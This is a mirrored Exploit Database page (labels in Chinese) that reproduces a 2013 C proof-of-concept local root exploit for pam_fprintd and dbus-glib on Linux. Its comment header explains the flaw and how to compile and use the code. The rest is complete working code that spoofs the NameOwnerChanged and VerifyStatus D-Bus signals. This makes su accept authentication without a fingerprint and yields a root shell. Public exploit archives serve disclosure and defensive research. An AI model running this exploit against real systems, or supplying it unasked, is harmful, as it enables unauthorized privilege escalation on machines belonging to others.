dbus-glib pam_fprintd – Local Privilege Escalation

• Exploit Database
• 6 阅读

• 作者： Sebastian Krahmer
  日期： 2014-06-02
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/33614/

• /* darklena. fprintd/pam_fprintd local root PoC. However dbus-glib plays an important role.
   *
   * (C) 2013 Sebastian Krahmer, all rights reversed.
   *
   * pam_fprintd uses net.reactivated.Fprint service to trigger finger swiping and
   * registers DBUS signal inside the PAM authentication function:
   *
   * dbus_g_proxy_add_signal(dev, "VerifyStatus", G_TYPE_STRING, G_TYPE_BOOLEAN, NULL);
   * dbus_g_proxy_add_signal(dev, "VerifyFingerSelected", G_TYPE_STRING, NULL);
   * dbus_g_proxy_connect_signal(dev, "VerifyStatus", G_CALLBACK(verify_result),
   * data, NULL);
   *
   * Then, when the DBUS signal arrives, the signal argument is basically just checked
   * to be the "verify-match" string; which however is expected to come from the legit
   * net.reactivated.Fprint service. Since there is no message filter registered in either
   * pam_fprintd, nor inside dbus-glib which it is using, such signals can be spoofed
   * by anyone. In order to do so, we first need to spoof a NameOwnerChanged signal
   * so the dbus_g_proxy_manager_filter() function inside dbus-glib will find our
   * sender-name (which cannot be spoofed) inside its hash tables and match it to
   * net.reactivated.Fprint.
   *
   * To test this PoC, start a service (su is fine) as user that is using pam_fprintd.
   * On a second xterm, when you see 'Swipe your ... finger' message start this PoC
   * and you will notice that a rootshell is spawned in the first xterm w/o giving your finger. :p
   *
   * Used various DBUS tutorials and example code, while writing this.
   *
   * $ cc darklena.c `pkg-config --cflags dbus-1` -ldbus-1 -Wall
   *
   */
  
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <unistd.h>
  #include <errno.h>
  #include <dbus/dbus.h>
  
  
  void die(const char *s)
  {
  perror(s);
  exit(errno);
  }
  
  
  int main(int argc, char **argv)
  {
  DBusError err;
  DBusConnection *conn = NULL;
  DBusMessage *vrfy_msg = NULL, *noc_msg = NULL, *nl_msg = NULL, *reply = NULL;
  dbus_uint32_t serial = 0;
  dbus_bool_t t = 1;
  int un = 0, i = 0, reply_to = -1;
  const char *vrfy_match = "verify-match", *cname = NULL,
   *name = "net.reactivated.Fprint", *prev_owner = NULL;
  char dest[32];
  
  /* override unique name of net.reactivated.Fprint */
  if (argc > 1)
  prev_owner = strdup(argv[1]);
  
  printf("\n[**] darklena, pam_fprintd PoC exploit 2013\n\n");
  
  printf("[*] Initializing DBUS ...\n");
  dbus_error_init(&err);
  conn = dbus_bus_get(DBUS_BUS_SYSTEM, &err);
  
  if (dbus_error_is_set(&err)) {
  fprintf(stderr, "Error: %s\n", err.message);
  die("dbus_error_is_set");
  }
  
  if ((cname = dbus_bus_get_unique_name(conn)) == NULL)
  die("dbus_bus_get_unique_name");
  
  un = atoi(strchr(cname, '.') + 1);
  
  printf("[+] Done. Found my unique name: %s (%d)\n", cname, un);
  
  if (!prev_owner) {
  printf("[*] Trying to find unique name of '%s' ...\n", name);
  nl_msg = dbus_message_new_method_call("org.freedesktop.DBus",
  "/org/freedesktop/DBus",
  "org.freedesktop.DBus",
  "GetNameOwner");
  
  if (!dbus_message_append_args(nl_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_INVALID))
  die("[-] dbus_message_append_args");
  
  reply = dbus_connection_send_with_reply_and_block(conn, nl_msg, reply_to, &err);
  dbus_message_unref(nl_msg);
  
  if (dbus_error_is_set(&err)) {
  fprintf (stderr, "[-] Error: %s\n", err.message);
  die("[-] dbus_connection_send_with_reply_and_block");
  }
  
  if (!dbus_message_get_args(reply, &err,
   DBUS_TYPE_STRING, &prev_owner, DBUS_TYPE_INVALID)) {
  fprintf(stderr, "[-] Error: %s\n", err.message);
  die("[-] dbus_message_get_args");
  }
  
  dbus_message_unref(reply);
  }
  
  printf("[+] Found unique name of '%s' as '%s'\n", name, prev_owner);
  
  for (i = 1; i < 20; ++i) {
  /* spoof a NameOwnerChanged signal */
  noc_msg = dbus_message_new_signal("/org/freedesktop/DBus",
  "org.freedesktop.DBus",
  "NameOwnerChanged");
  
  /* spoof a VerifyStatus */
  vrfy_msg = dbus_message_new_signal("/net/reactivated/Fprint/Device/0",
   "net.reactivated.Fprint.Device",
   "VerifyStatus");
  
  if (!vrfy_msg || !noc_msg)
  die("[-] dbus_message_new_signal");
  
  if (!dbus_message_append_args(noc_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_STRING,
  &prev_owner, DBUS_TYPE_STRING, &cname, DBUS_TYPE_INVALID))
  die("[-] dbus_message_append_args1");
  
  if (!dbus_message_append_args(vrfy_msg, DBUS_TYPE_STRING, &vrfy_match,
  DBUS_TYPE_BOOLEAN, &t, DBUS_TYPE_INVALID))
  die("[-] dbus_message_append_args2");
  
  /* iterate over unique names short below under our own
   * to hit the previously started su
   */
  snprintf(dest, sizeof(dest), ":1.%d", un - i);
  printf("[*] Using new destination: %s\n", dest);
  
  if (!dbus_message_set_destination(vrfy_msg, dest))
  die("[-] dbus_message_set_destination");
  
  if (!dbus_message_set_destination(noc_msg, dest))
  die("[-] dbus_message_set_destination");
  
  if (!dbus_connection_send(conn, noc_msg, &serial))
  die("[-] dbus_connection_send");
  
  dbus_connection_flush(conn);
  usleep(1000);
  
  if (!dbus_connection_send(conn, vrfy_msg, &serial))
  die("[-] dbus_connection_send");
  
  dbus_connection_flush(conn);
  
  dbus_message_unref(vrfy_msg);
  dbus_message_unref(noc_msg);
  }
  
  printf("\n[**] Here comes the pain! (but no one's to too innocent to die)\n");
  return 0;
  }